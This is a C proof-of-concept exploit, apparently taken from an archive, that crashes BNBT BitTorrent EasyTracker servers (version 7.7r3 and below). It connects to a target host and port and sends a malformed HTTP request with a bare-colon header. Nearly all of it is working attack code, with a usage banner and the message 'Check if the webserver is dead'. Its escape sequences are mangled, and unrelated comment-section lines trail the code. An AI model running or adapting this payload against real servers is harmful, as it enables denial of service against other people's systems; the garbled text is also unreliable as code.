/* BNBT BitTorrent EasyTracker Remote Denial Of Service
Versions:
Version 7.7r3.2004.10.27 and below
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
Bug find and coded by:
Sowhat@@secway@org
http://secway.org
This PoC will Crash the server.
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET /index.htm HTTP/1.0rn:rnrn";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf(" ######################################################################rn");
printf(" # BNBT BitTorrent EasyTracker DoS by sowhat <sowhat@@secway@org> #rn", argv[0]);
printf(" # This exploit will Crash the Server #rn");
printf(" # http://www.secway.org #rn");
printf(" ######################################################################rn");
printf(" Usage:rn %s <targetip> [targetport] (default is 6969) rn", argv[0]);
printf(" Example:rn");
printf(" %s 1.1.1.1rn",argv[0]);
printf(" %s 1.1.1.1 8888rn",argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 6969;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!rn");
exit(1);
}
printf("Resolving Hostnames...n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failedn", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.n");
exit(1);
}
printf("Connected!...n");
printf("Sending Payload...n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payloadrn");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead.rn");
closesocket(mysocket);
WSACleanup();
return 0;
}
// milw0rm.com [2005-09-06]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666